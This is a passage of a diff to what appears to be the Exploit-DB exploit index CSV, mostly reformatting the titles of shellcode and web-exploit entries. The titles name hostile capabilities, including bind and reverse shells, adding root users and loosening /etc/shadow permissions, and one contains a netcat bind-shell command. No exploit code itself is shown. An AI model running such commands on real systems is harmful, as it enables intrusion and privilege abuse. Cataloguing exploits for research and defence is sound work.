 13430,platforms/lin_x86/shellcode/13430.c,"Linux/x86 - symlink . /bin/sh Shellcode (32 bytes)",2004-09-26,dev0id,lin_x86,shellcode,0
 13431,platforms/lin_x86/shellcode/13431.c,"Linux/x86 - kill snort Shellcode (151 bytes)",2004-09-26,nob0dy,lin_x86,shellcode,0
 13432,platforms/lin_x86/shellcode/13432.c,"Linux/x86 - Shared Memory exec Shellcode (50 bytes)",2004-09-26,sloth,lin_x86,shellcode,0
@ -15897,18 +15898,18 @@ id,file,description,date,author,platform,type,port
 13447,platforms/lin_x86/shellcode/13447.c,"Linux/x86 - execve /bin/sh setreuid(12_12) Shellcode (50 bytes)",2004-09-12,anonymous,lin_x86,shellcode,0
 13448,platforms/lin_x86/shellcode/13448.c,"Linux/x86 - Bind 5074/TCP Shellcode (92 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0
 13449,platforms/lin_x86/shellcode/13449.c,"Linux/x86 - Bind 5074/TCP + fork() Shellcode (130 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0
-13450,platforms/lin_x86/shellcode/13450.c,"Linux/x86 - Add User 't00r' Shellcode (82 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0
+13450,platforms/lin_x86/shellcode/13450.c,"Linux/x86 - Add User (t00r) Shellcode (82 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0
 13451,platforms/lin_x86/shellcode/13451.c,"Linux/x86 - Add User Shellcode (104 bytes)",2004-09-12,"Matt Conover",lin_x86,shellcode,0
 13452,platforms/lin_x86/shellcode/13452.c,"Linux/x86 - break chroot Shellcode (34 bytes)",2004-09-12,dev0id,lin_x86,shellcode,0
 13453,platforms/lin_x86/shellcode/13453.c,"Linux/x86 - break chroot Shellcode (46 bytes)",2004-09-12,dev0id,lin_x86,shellcode,0
 13454,platforms/lin_x86/shellcode/13454.c,"Linux/x86 - break chroot execve /bin/sh Shellcode (80 bytes)",2004-09-12,preedator,lin_x86,shellcode,0
-13455,platforms/lin_x86/shellcode/13455.c,"Linux/x86 - execve /bin/sh encrypted Shellcode (58 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0
+13455,platforms/lin_x86/shellcode/13455.c,"Linux/x86 - execve /bin/sh Anti-IDS Shellcode (58 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0
-13456,platforms/lin_x86/shellcode/13456.c,"Linux/x86 - execve /bin/sh xor encrypted Shellcode (55 bytes)",2004-09-12,anonymous,lin_x86,shellcode,0
+13456,platforms/lin_x86/shellcode/13456.c,"Linux/x86 - execve /bin/sh (XOR Encoded) Shellcode (55 bytes)",2004-09-12,anonymous,lin_x86,shellcode,0
 13457,platforms/lin_x86/shellcode/13457.c,"Linux/x86 - execve /bin/sh (tolower() Evasion) Shellcode (41 bytes)",2004-09-12,anonymous,lin_x86,shellcode,0
 13458,platforms/lin_x86/shellcode/13458.c,"Linux/x86 - setreuid(0_0) + execve /bin/sh  Shellcode (46+ bytes)",2001-05-07,"Marco Ivaldi",lin_x86,shellcode,0
 13459,platforms/lin_x86/shellcode/13459.c,"Linux/x86 - chroot()/execve() code Shellcode (80 bytes)",2001-01-13,preedator,lin_x86,shellcode,0
 13460,platforms/lin_x86/shellcode/13460.c,"Linux/x86 - execve /bin/sh (toupper() Evasion) Shellcode (55 bytes)",2000-08-08,anonymous,lin_x86,shellcode,0
-13461,platforms/lin_x86/shellcode/13461.c,"Linux/x86 - Add User 'z' Shellcode (70 bytes)",2000-08-07,anonymous,lin_x86,shellcode,0
+13461,platforms/lin_x86/shellcode/13461.c,"Linux/x86 - Add User (z) Shellcode (70 bytes)",2000-08-07,anonymous,lin_x86,shellcode,0
 13462,platforms/lin_x86/shellcode/13462.c,"Linux/x86 - break chroot setuid(0) + /bin/sh Shellcode (132 bytes)",2000-08-07,anonymous,lin_x86,shellcode,0
 13463,platforms/lin_x86-64/shellcode/13463.c,"Linux/x86-64 - Bind 4444/TCP Shellcode (132 bytes)",2009-05-18,evil.xi4oyu,lin_x86-64,shellcode,0
 13464,platforms/lin_x86-64/shellcode/13464.s,"Linux/x86-64 - execve(/bin/sh) Shellcode (33 bytes)",2006-11-02,hophet,lin_x86-64,shellcode,0
@ -16058,8 +16059,8 @@ id,file,description,date,author,platform,type,port
 13728,platforms/lin_x86/shellcode/13728.c,"Linux/x86 - sys_setuid(0) + sys_setgid(0) + execve (_/bin/sh_) Shellcode (39 bytes)",2010-06-01,gunslinger_,lin_x86,shellcode,0
 13729,platforms/win_x86-64/shellcode/13729.txt,"Windows 7 x64 - cmd Shellcode (61 bytes)",2010-06-01,agix,win_x86-64,shellcode,0
 13730,platforms/lin_x86/shellcode/13730.c,"Linux/x86 - unlink _/etc/shadow_ Shellcode (33 bytes)",2010-06-02,gunslinger_,lin_x86,shellcode,0
-13731,platforms/lin_x86/shellcode/13731.c,"Linux/x86 - hard / unclean reboot Shellcode (29 bytes)",2010-06-03,gunslinger_,lin_x86,shellcode,0
+13731,platforms/lin_x86/shellcode/13731.c,"Linux/x86 - Hard / Unclean Reboot Shellcode (29 bytes)",2010-06-03,gunslinger_,lin_x86,shellcode,0
-13732,platforms/lin_x86/shellcode/13732.c,"Linux/x86 - hard / unclean reboot Shellcode (33 bytes)",2010-06-03,gunslinger_,lin_x86,shellcode,0
+13732,platforms/lin_x86/shellcode/13732.c,"Linux/x86 - Hard / Unclean Reboot Shellcode (33 bytes)",2010-06-03,gunslinger_,lin_x86,shellcode,0
 13733,platforms/solaris/shellcode/13733.c,"Solaris/x86 - SystemV killall command Shellcode (39 bytes)",2010-06-03,"Jonathan Salwan",solaris,shellcode,0
 13742,platforms/lin_x86/shellcode/13742.c,"Linux/x86 - chown root:root /bin/sh Shellcode (48 bytes)",2010-06-06,gunslinger_,lin_x86,shellcode,0
 13743,platforms/lin_x86/shellcode/13743.c,"Linux/x86 - give all user root access when execute /bin/sh Shellcode (45 bytes)",2010-06-06,gunslinger_,lin_x86,shellcode,0
@ -16080,13 +16081,13 @@ id,file,description,date,author,platform,type,port
 14139,platforms/arm/shellcode/14139.c,"Linux/ARM - Disable ASLR Security Shellcode (102 bytes)",2010-06-30,"Jonathan Salwan",arm,shellcode,0
 14190,platforms/arm/shellcode/14190.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL); (XOR 88 encoded) Polymorphic Shellcode (78 bytes)",2010-07-03,"Jonathan Salwan",arm,shellcode,0
 14216,platforms/lin_x86/shellcode/14216.c,"Linux/x86 - Bind Shell 64533 Shellcode (97 bytes)",2010-07-05,Magnefikko,lin_x86,shellcode,0
-14218,platforms/linux/shellcode/14218.c,"Linux - Drop suid shell root in /tmp/.hiddenshell Polymorphic Shellcode (161 bytes)",2010-07-05,gunslinger_,linux,shellcode,0
+14218,platforms/linux/shellcode/14218.c,"Linux - Drop SUID Root Shell (/tmp/.hiddenshell) Polymorphic Shellcode (161 bytes)",2010-07-05,gunslinger_,linux,shellcode,0
 14219,platforms/linux/shellcode/14219.c,"Linux - setreuid(0_0) execve(_/bin/sh__NULL_NULL) XOR Encoded Shellcode (62 bytes)",2010-07-05,gunslinger_,linux,shellcode,0
 14221,platforms/windows/shellcode/14221.html,"Safari 4.0.5 - 5.0.0 (Windows XP /  7) - JavaScript JITed exec calc (ASLR/DEP Bypass) Shellcode",2010-07-05,"Alexey Sintsov",windows,shellcode,0
 14234,platforms/linux/shellcode/14234.c,"Linux - Bind 6778/TCP (XOR Encoded) Polymorphic Shellcode (125 bytes)",2010-07-05,gunslinger_,linux,shellcode,0
-14235,platforms/linux/shellcode/14235.c,"Linux - _nc -lp 31337 -e /bin//sh_ Polymorphic Shellcode (91 bytes)",2010-07-05,gunslinger_,linux,shellcode,0
+14235,platforms/linux/shellcode/14235.c,"Linux - Bind Shell (nc -lp 31337 -e /bin//sh) Polymorphic Shellcode (91 bytes)",2010-07-05,gunslinger_,linux,shellcode,0
 14261,platforms/arm/shellcode/14261.c,"ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Polymorphic Shellcode (Generator)",2010-07-07,"Jonathan Salwan",arm,shellcode,0
-14276,platforms/linux/shellcode/14276.c,"Linux - Find all writeable folder in filesystem polymorphic Shellcode (91 bytes)",2010-07-08,gunslinger_,linux,shellcode,0
+14276,platforms/linux/shellcode/14276.c,"Linux - Find All Writeable Folder In FileSystem Polymorphic Shellcode (91 bytes)",2010-07-08,gunslinger_,linux,shellcode,0
 14288,platforms/win_x86/shellcode/14288.asm,"Win32 - Write-to-file Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",win_x86,shellcode,0
 14305,platforms/lin_x86-64/shellcode/14305.c,"Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) Shellcode (49 bytes)",2010-07-09,10n1z3d,lin_x86-64,shellcode,0
 14332,platforms/lin_x86/shellcode/14332.c,"Linux/x86 - Bind Shell Netcat 8080/TCP Shellcode (75 bytes)",2010-07-11,blake,lin_x86,shellcode,0
@ -16130,8 +16131,8 @@ id,file,description,date,author,platform,type,port
 18197,platforms/lin_x86-64/shellcode/18197.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (52 bytes)",2011-12-03,X-h4ck,lin_x86-64,shellcode,0
 18226,platforms/linux_mips/shellcode/18226.c,"Linux/MIPS - Connectback Shellcode (port 0x7a69) (168 bytes)",2011-12-10,rigan,linux_mips,shellcode,0
 18227,platforms/linux_mips/shellcode/18227.c,"Linux/MIPS - reboot() Shellcode (32 bytes)",2011-12-10,rigan,linux_mips,shellcode,0
-18294,platforms/lin_x86/shellcode/18294.c,"Linux/x86 - setuid(0) + setgid(0) + add user 'iph' Without Password to /etc/passwd Polymorphic Shellcode",2011-12-31,pentesters.ir,lin_x86,shellcode,0
+18294,platforms/lin_x86/shellcode/18294.c,"Linux/x86 - setuid(0) + setgid(0) + Add User (iph) To /etc/passwd Polymorphic Shellcode",2011-12-31,pentesters.ir,lin_x86,shellcode,0
-18379,platforms/lin_x86/shellcode/18379.c,"Linux/x86 - Search For php/html Writable Files and Add Your Code Shellcode (380+ bytes)",2012-01-17,rigan,lin_x86,shellcode,0
+18379,platforms/lin_x86/shellcode/18379.c,"Linux/x86 - Search For PHP/HTML Writable Files and Add Your Code Shellcode (380+ bytes)",2012-01-17,rigan,lin_x86,shellcode,0
 18585,platforms/lin_x86-64/shellcode/18585.s,"Linux/x86-64 - Add User (t0r/Winner) Shellcode (189 bytes)",2012-03-12,0_o,lin_x86-64,shellcode,0
 18885,platforms/lin_x86/shellcode/18885.c,"Linux/x86 - execve(/bin/dash) Shellcode (42 bytes)",2012-05-16,X-h4ck,lin_x86,shellcode,0
 20196,platforms/lin_x86/shellcode/20196.c,"Linux/x86 - chmod 666 /etc/passwd + /etc/shadow Shellcode (57 bytes)",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode,0
@ -16141,9 +16142,9 @@ id,file,description,date,author,platform,type,port
 40363,platforms/win_x86/shellcode/40363.c,"Windows x86 - Bind TCP Password Protected Shellcode (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
 22489,platforms/windows/shellcode/22489.cpp,"Windows XP Professional SP3 - Full ROP calc Shellcode (428 bytes)",2012-11-05,b33f,windows,shellcode,0
 40890,platforms/win_x86-64/shellcode/40890.c,"Windows x64 - Bind Shell TCP Shellcode (508 bytes)",2016-12-08,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
-23622,platforms/lin_x86/shellcode/23622.c,"Linux/x86 - Remote Port Forwarding Shellcode (87 bytes)",2012-12-24,"Hamza Megahed",lin_x86,shellcode,0
+23622,platforms/lin_x86/shellcode/23622.c,"Linux/x86 - Remote Port Forwarding (ssh -R 9999:localhost:22 192.168.0.226) Shellcode (87 bytes)",2012-12-24,"Hamza Megahed",lin_x86,shellcode,0
 24318,platforms/windows/shellcode/24318.c,"Windows - URLDownloadToFile + WinExec + ExitProcess Shellcode",2013-01-24,RubberDuck,windows,shellcode,0
-25497,platforms/lin_x86/shellcode/25497.c,"Linux/x86 - Reverse TCP Bind 192.168.1.10:31337 Shellcode (92 bytes)",2013-05-17,"Russell Willis",lin_x86,shellcode,0
+25497,platforms/lin_x86/shellcode/25497.c,"Linux/x86 - Reverse TCP (192.168.1.10:31337) Shellcode (92 bytes)",2013-05-17,"Russell Willis",lin_x86,shellcode,0
 40387,platforms/hardware/shellcode/40387.nasm,"Cisco ASA - Authentication Bypass 'EXTRABACON' (Improved Shellcode) (69 bytes)",2016-09-16,"Sean Dillon",hardware,shellcode,0
 27132,platforms/hardware/shellcode/27132.txt,"MIPS (Little Endian) - system() Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",hardware,shellcode,0
 27180,platforms/arm/shellcode/27180.asm,"Windows RT ARM - Bind Shell 4444/TCP Shellcode",2013-07-28,"Matthew Graeber",arm,shellcode,0
@ -16158,7 +16159,7 @@ id,file,description,date,author,platform,type,port
 34262,platforms/lin_x86/shellcode/34262.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add New Root User (ALI/ALI) + Execute /bin/sh Shellcode (378 bytes)",2014-08-04,"Ali Razmjoo",lin_x86,shellcode,0
 34592,platforms/lin_x86/shellcode/34592.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add New Root User (ALI/ALI) + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)",2014-09-09,"Ali Razmjoo",lin_x86,shellcode,0
 34667,platforms/lin_x86-64/shellcode/34667.c,"Linux/x86-64 - Connect Back Shellcode (139 bytes)",2014-09-15,MadMouse,lin_x86-64,shellcode,0
-34778,platforms/lin_x86/shellcode/34778.c,"Linux/x86 - Add map in /etc/hosts file (google.com 127.1.1.1) Shellcode (77 bytes)",2014-09-25,"Javier Tejedor",lin_x86,shellcode,0
+34778,platforms/lin_x86/shellcode/34778.c,"Linux/x86 - Add Map (google.com 127.1.1.1) In /etc/hosts Shellcode (77 bytes)",2014-09-25,"Javier Tejedor",lin_x86,shellcode,0
 35205,platforms/lin_x86-64/shellcode/35205.txt,"Linux/x86-64 - Position independent + execve(_/bin/sh\0__NULL_NULL); Alphanumeric Shellcode (87 bytes)",2014-11-10,Breaking.Technology,lin_x86-64,shellcode,0
 35519,platforms/lin_x86/shellcode/35519.txt,"Linux/x86 - rmdir Shellcode (37 bytes)",2014-12-11,kw4,lin_x86,shellcode,0
 35586,platforms/lin_x86-64/shellcode/35586.c,"Linux/x86-64 - Bind 4444/TCP Shellcode (81 bytes / 96 bytes with password)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0
@ -16172,7 +16173,7 @@ id,file,description,date,author,platform,type,port
 36359,platforms/lin_x86-64/shellcode/36359.c,"Linux/x86-64 - Reads Data From /etc/passwd To /tmp/outfile Shellcode (118 bytes)",2014-03-27,"Chris Higgins",lin_x86-64,shellcode,0
 36391,platforms/lin_x86/shellcode/36391.c,"Linux/x86 - execve(_/bin/sh_) (ROT13 Encoded) Shellcode (68 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
 36393,platforms/lin_x86/shellcode/36393.c,"Linux/x86 - chmod 0777 /etc/shadow obfuscated Shellcode (84 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
-36394,platforms/lin_x86/shellcode/36394.c,"Linux/x86 - Add Map google.com to 127.1.1.1 Obfuscated Shellcode (98 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
+36394,platforms/lin_x86/shellcode/36394.c,"Linux/x86 - Add Map (google.com 127.1.1.1) In /etc/hosts Obfuscated Shellcode (98 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
 36395,platforms/lin_x86/shellcode/36395.c,"Linux/x86 - execve(_/bin/sh_) Obfuscated Shellcode (40 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
 36397,platforms/lin_x86/shellcode/36397.c,"Linux/x86 - Reverse TCP Shell Shellcode (72 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
 36398,platforms/lin_x86/shellcode/36398.c,"Linux/x86 - Bind Shell 33333/TCP Shellcode (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
@ -16206,11 +16207,11 @@ id,file,description,date,author,platform,type,port
 37393,platforms/lin_x86/shellcode/37393.asm,"Linux/x86 - exec('/bin/dash') Shellcode (45 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0
 37401,platforms/lin_x86-64/shellcode/37401.asm,"Linux/x86-64 - execve Encoded Shellcode (57 bytes)",2015-06-27,"Bill Borskey",lin_x86-64,shellcode,0
 37427,platforms/lin_x86-64/shellcode/37427.txt,"Linux/x86-64 - execve Encoded Shellcode (57 bytes)",2015-06-29,"Bill Borskey",lin_x86-64,shellcode,0
-37495,platforms/lin_x86/shellcode/37495.py,"Linux/x86 - /bin/sh ROT7 Encoded Shellcode",2015-07-05,"Artem T",lin_x86,shellcode,0
+37495,platforms/lin_x86/shellcode/37495.py,"Linux/x86 - /bin/sh (ROT7 Encoded) Shellcode",2015-07-05,"Artem T",lin_x86,shellcode,0
 37664,platforms/win_x86/shellcode/37664.c,"Win32/XP SP3 (TR) - MessageBox Shellcode (24 bytes)",2015-07-21,B3mB4m,win_x86,shellcode,0
 37749,platforms/lin_x86/shellcode/37749.c,"Linux/x86 - Egghunter Shellcode (19 bytes)",2015-08-10,"Guillaume Kaddouch",lin_x86,shellcode,0
 37758,platforms/win_x86/shellcode/37758.c,"Windows x86 - user32!MessageBox 'Hello World!' Null-Free Shellcode (199 bytes)",2015-08-12,noviceflux,win_x86,shellcode,0
-37762,platforms/lin_x86/shellcode/37762.py,"Linux/x86 - /bin/sh ROL/ROR Encoded Shellcode",2015-08-12,"Anastasios Monachos",lin_x86,shellcode,0
+37762,platforms/lin_x86/shellcode/37762.py,"Linux/x86 - /bin/sh (ROL/ROR Encoded) Shellcode",2015-08-12,"Anastasios Monachos",lin_x86,shellcode,0
 37895,platforms/win_x86-64/shellcode/37895.asm,"Windows 2003 x64 - Token Stealing Shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",win_x86-64,shellcode,0
 38065,platforms/osx/shellcode/38065.txt,"OSX/x86-64 - /bin/sh Null-Free Shellcode (34 bytes)",2015-09-02,"Fitzl Csaba",osx,shellcode,0
 38075,platforms/system_z/shellcode/38075.txt,"Mainframe/System Z - Bind Shell 12345/TCP Shellcode (2488 bytes)",2015-09-02,"Bigendian Smalls",system_z,shellcode,0
@ -16234,7 +16235,7 @@ id,file,description,date,author,platform,type,port
 39204,platforms/lin_x86/shellcode/39204.c,"Linux/x86 - Egghunter Shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0
 39312,platforms/lin_x86-64/shellcode/39312.c,"Linux/x86-64 - execve (xor/not/div Encoded) Shellcode (54 bytes)",2016-01-25,"Sathish kumar",lin_x86-64,shellcode,0
 39336,platforms/linux/shellcode/39336.c,"Linux x86/x86-64 - reverse_tcp (192.168.1.29:4444) Shellcode (195 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
-39337,platforms/linux/shellcode/39337.c,"Linux x86/x86-64 - tcp_bind Port 4444 Shellcode (251 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
+39337,platforms/linux/shellcode/39337.c,"Linux x86/x86-64 - Bind 4444/TCP Shellcode (251 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
 39338,platforms/linux/shellcode/39338.c,"Linux x86/x86-64 - Read /etc/passwd Shellcode (156 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
 39383,platforms/lin_x86-64/shellcode/39383.c,"Linux/x86-64 - shell_reverse_tcp Password Polymorphic Shellcode (1) (122 bytes)",2016-01-29,"Sathish kumar",lin_x86-64,shellcode,0
 39388,platforms/lin_x86-64/shellcode/39388.c,"Linux/x86-64 - shell_reverse_tcp Password Polymorphic Shellcode (2) (135 bytes)",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0
@ -16271,7 +16272,7 @@ id,file,description,date,author,platform,type,port
 40005,platforms/win_x86/shellcode/40005.c,"Windows x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes)",2016-06-22,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
 40026,platforms/lin_x86/shellcode/40026.txt,"Linux/x86 - /bin/sh + ASLR Bruteforce Shellcode",2016-06-27,"Pawan Lal",lin_x86,shellcode,0
 40029,platforms/lin_x86-64/shellcode/40029.c,"Linux/x86-64 - /etc/passwd File Sender Shellcode (164 bytes)",2016-06-28,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
-40052,platforms/lin_x86-64/shellcode/40052.c,"Linux/x86-64 - Bind NetCat Shellcode (64 bytes)",2016-07-04,Kyzer,lin_x86-64,shellcode,0
+40052,platforms/lin_x86-64/shellcode/40052.c,"Linux/x86-64 - Bind Netcat Shellcode (64 bytes)",2016-07-04,Kyzer,lin_x86-64,shellcode,0
 40056,platforms/lin_x86/shellcode/40056.c,"Linux/x86 - Bind Shell 4444/TCP Shellcode (98 bytes)",2016-07-04,sajith,lin_x86,shellcode,0
 40061,platforms/lin_x86-64/shellcode/40061.c,"Linux/x86-64 - Ncat Shellcode (SSL_ MultiChannel_ Persistant_ Fork_ IPv4/6_ Password) (176 bytes)",2016-07-06,Kyzer,lin_x86-64,shellcode,0
 40075,platforms/lin_x86/shellcode/40075.c,"Linux/x86 - Reverse TCP Shellcode (75 bytes)",2016-07-08,sajith,lin_x86,shellcode,0
@ -16284,7 +16285,7 @@ id,file,description,date,author,platform,type,port
 40175,platforms/win_x86/shellcode/40175.c,"Windows 7 x86 - localhost Port Scanner Shellcode (556 bytes)",2016-07-29,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
 40179,platforms/lin_x86/shellcode/40179.c,"Linux/x86 - Bind Netcat with Port Shellcode (44/52 bytes)",2016-07-29,Kyzer,lin_x86,shellcode,0
 40222,platforms/lin_x86/shellcode/40222.c,"Linux/x86 - Bind zsh 9090/TCP Shellcode (96 bytes)",2016-08-10,thryb,lin_x86,shellcode,0
-40223,platforms/lin_x86/shellcode/40223.c,"Linux/x86 - Reverse zsh 9090/TCP Shellcode (80 bytes)",2016-08-10,thryb,lin_x86,shellcode,0
+40223,platforms/lin_x86/shellcode/40223.c,"Linux/x86 - Reverse ZSH 127.255.255.254:9090/TCP Shellcode (80 bytes)",2016-08-10,thryb,lin_x86,shellcode,0
 40245,platforms/win_x86/shellcode/40245.c,"Windows x86 - MessageBoxA Shellcode (242 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
 40246,platforms/win_x86/shellcode/40246.c,"Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
 40259,platforms/win_x86/shellcode/40259.c,"Windows x86 - InitiateSystemShutdownA() Shellcode (599 bytes)",2016-08-18,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
@ -16300,10 +16301,10 @@ id,file,description,date,author,platform,type,port
 41089,platforms/lin_x86-64/shellcode/41089.c,"Linux/x86-64 - mkdir Shellcode (25 bytes)",2017-01-18,"Ajith Kp",lin_x86-64,shellcode,0
 41128,platforms/lin_x86-64/shellcode/41128.c,"Linux/x86-64 - Bind 5600/TCP - Shellcode (87 bytes)",2017-01-19,"Ajith Kp",lin_x86-64,shellcode,0
 41174,platforms/lin_x86-64/shellcode/41174.nasm,"Linux/x86-64 - execve /bin/sh Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",lin_x86-64,shellcode,0
-41183,platforms/linux/shellcode/41183.c,"Linux - Multi/Dual mode execve(_/bin/sh__ NULL_ 0) Shellcode (37 bytes)",2017-01-29,odzhancode,linux,shellcode,0
+41183,platforms/linux/shellcode/41183.c,"Linux - execve(_/bin/sh__ NULL_ 0) Multi/Dual Mode Shellcode (37 bytes)",2017-01-29,odzhancode,linux,shellcode,0
-41220,platforms/linux/shellcode/41220.c,"Linux - Multi/Dual mode Reverse Shell Shellcode (129 bytes)",2017-02-02,odzhancode,linux,shellcode,0
+41220,platforms/linux/shellcode/41220.c,"Linux - Reverse Shell Multi/Dual Mode Shellcode (Genearator) (129 bytes)",2017-02-02,odzhancode,linux,shellcode,0
 41282,platforms/lin_x86/shellcode/41282.nasm,"Linux/x86 - Reverse TCP Alphanumeric Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",lin_x86,shellcode,0
-41375,platforms/linux/shellcode/41375.c,"Linux - Dual/Multi mode Bind Shell Shellcode (156 bytes)",2017-02-16,odzhancode,linux,shellcode,0
+41375,platforms/linux/shellcode/41375.c,"Linux - Bind Shell Dual/Multi Mode Shellcode (156 bytes)",2017-02-16,odzhancode,linux,shellcode,0
 41381,platforms/win_x86/shellcode/41381.c,"Windows x86 - Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",win_x86,shellcode,0
 41398,platforms/lin_x86-64/shellcode/41398.nasm,"Linux/x86-64 - Reverse TCP Shellcode (65 bytes)",2017-02-19,"Robert L. Taylor",lin_x86-64,shellcode,0
 41403,platforms/lin_x86/shellcode/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,lu0xheap,lin_x86,shellcode,0
@ -16314,8 +16315,8 @@ id,file,description,date,author,platform,type,port
 41481,platforms/win_x86/shellcode/41481.asm,"Windows x86 - Reverse TCP Staged Alphanumeric Shellcode (332 Bytes)",2017-03-01,"Snir Levi",win_x86,shellcode,0
 41498,platforms/lin_x86-64/shellcode/41498.nasm,"Linux/x86-64 - Setuid(0) + Execve(/bin/sh) Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0
 41503,platforms/lin_x86-64/shellcode/41503.nasm,"Linux/x86-64 - Flush IPTables Polymorphic Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0
-41509,platforms/lin_x86-64/shellcode/41509.nasm,"Linux/x86-64 - Reverse NetCat Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
+41509,platforms/lin_x86-64/shellcode/41509.nasm,"Linux/x86-64 - Reverse Netcat Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
-41510,platforms/lin_x86-64/shellcode/41510.nsam,"Linux/x86-64 - Reverse NetCat Polymorphic Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
+41510,platforms/lin_x86-64/shellcode/41510.nsam,"Linux/x86-64 - Reverse Netcat Polymorphic Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
 41581,platforms/win_x86/shellcode/41581.c,"Windows x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",win_x86,shellcode,0
 41630,platforms/lin_x86/shellcode/41630.asm,"Linux/x86 - exceve(_/bin/sh_) Encoded Shellcode (44 Bytes)",2017-03-17,WangYihang,lin_x86,shellcode,0
 41631,platforms/lin_x86/shellcode/41631.c,"Linux/x86 - Bind Shell Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",lin_x86,shellcode,0
@ -32904,7 +32905,7 @@ id,file,description,date,author,platform,type,port
 32455,platforms/php/webapps/32455.pl,"Website Directory - 'index.php' Cross-Site Scripting",2008-10-03,"Ghost Hacker",php,webapps,0
 32459,platforms/java/webapps/32459.txt,"VeriSign Kontiki Delivery Management System 5.0 - 'action' Parameter Cross-Site Scripting",2008-10-05,"Mazin Faour",java,webapps,0
 32461,platforms/php/webapps/32461.txt,"AmpJuke 0.7.5 - 'index.php' SQL Injection",2008-10-03,S_DLA_S,php,webapps,0
-32462,platforms/php/webapps/32462.txt,"Simple Machines Forum (SMF) 1.1.6 - HTTP POST Request Filter Security Bypass",2008-10-06,WHK,php,webapps,0
+32462,platforms/php/webapps/32462.txt,"Simple Machines Forum (SMF) 1.1.6 - POST Request Filter Security Bypass",2008-10-06,WHK,php,webapps,0
 32463,platforms/php/webapps/32463.txt,"PHP Web Explorer 0.99b - main.php refer Parameter Traversal Local File Inclusion",2008-10-06,Pepelux,php,webapps,0
 32464,platforms/php/webapps/32464.txt,"PHP Web Explorer 0.99b - 'edit.php' File Parameter Traversal Local File Inclusion",2008-10-06,Pepelux,php,webapps,0
 32467,platforms/php/webapps/32467.txt,"Opera Web Browser 8.51 - URI redirection Remote Code Execution",2008-10-08,MATASANOS,php,webapps,0
@ -38120,3 +38121,10 @@ id,file,description,date,author,platform,type,port
 42284,platforms/hardware/webapps/42284.py,"Humax HG100R 2.0.6 - Backup File Download",2017-06-30,gambler,hardware,webapps,0
 42293,platforms/hardware/webapps/42293.txt,"OpenDreamBox 2.0.0 Plugin WebAdmin - Remote Code Execution",2017-07-03,"Jonatas Fil",hardware,webapps,0
 42290,platforms/linux/webapps/42290.txt,"BOA Web Server 0.94.14rc21 - Arbitrary File Access",2017-06-20,"Miguel Mendez Z",linux,webapps,0
 42306,platforms/linux/webapps/42306.txt,"NfSen < 1.3.7 / AlienVault OSSIM 5.3.4 - Command Injection",2017-07-10,"Paul Taylor",linux,webapps,0
 42307,platforms/hardware/webapps/42307.txt,"Pelco Sarix/Spectra Cameras - Cross-Site Request Forgery / Cross-Site Scripting",2017-07-10,LiquidWorm,hardware,webapps,0
 42308,platforms/hardware/webapps/42308.txt,"Pelco Sarix/Spectra Cameras - Cross-Site Request Forgery (Enable SSH Root Access)",2017-07-10,LiquidWorm,hardware,webapps,0
